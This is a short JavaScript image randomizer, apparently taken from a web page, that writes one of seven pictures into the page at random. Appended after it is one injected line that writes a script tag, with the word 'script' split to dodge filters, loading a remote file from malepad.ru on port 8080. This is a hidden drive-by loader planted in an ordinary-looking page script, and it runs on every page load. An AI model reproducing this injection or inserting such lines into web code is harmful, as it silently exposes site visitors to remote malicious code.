
<!--

//Insert the text/images to be randomized
var img1 = "images/pic3.jpg"
var img2 = "images/pic3b.jpg"
var img3 = "images/pic3c.jpg"
var img4 = "images/pic3d.jpg"
var img5 = "images/pic3e.jpg"
var img6 = "images/pic3f.jpg"
var img7 = "images/pic3g.jpg"

//get a random number...
var randomize = Math.round(Math.random()*7)

//select text/image based on random number
if (randomize == 1){
newimg = img1
}else if (randomize == 2){
newimg = img2
}else if (randomize == 3){
newimg = img3
}else if (randomize == 4){
newimg = img5
}else if (randomize == 5){
newimg = img4
}else if (randomize == 6){
newimg = img6

}else{
newimg = img7
}

//output text/image
document.write('<IMG SRC="'+newimg+'">')

//-->



document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Num_Lock.js"></scr'+'ipt>');